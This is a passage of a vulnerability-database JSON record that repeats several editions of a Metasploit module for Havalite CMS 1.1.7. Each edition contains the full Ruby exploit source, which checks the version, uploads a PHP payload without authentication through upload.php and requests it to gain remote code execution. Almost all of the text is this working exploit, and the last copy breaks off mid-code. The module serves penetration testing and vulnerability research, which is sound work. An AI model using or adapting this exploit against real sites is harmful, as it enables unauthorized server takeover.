module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-05-07T14:59:01", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-05-07T14:59:01", "differentElements": ["modified", "published"], "edition": 39}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-05-07T17:09:11", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-05-07T17:09:11", "differentElements": ["modified", "published"], "edition": 40}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-05-13T15:12:44", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-05-13T15:12:44", "differentElements": ["modified", "published"], "edition": 41}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-05-13T19:15:04", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-05-13T19:15:04", "differentElements": ["modified", "published"], "edition": 42}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-05-14T01:15:04", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-05-14T01:15:04", "differentElements": ["modified", "published"], "edition": 43}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-05-14T03:15:33", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-05-14T03:15:33", "differentElements": ["modified", "published"], "edition": 44}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-05-15T19:13:30", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
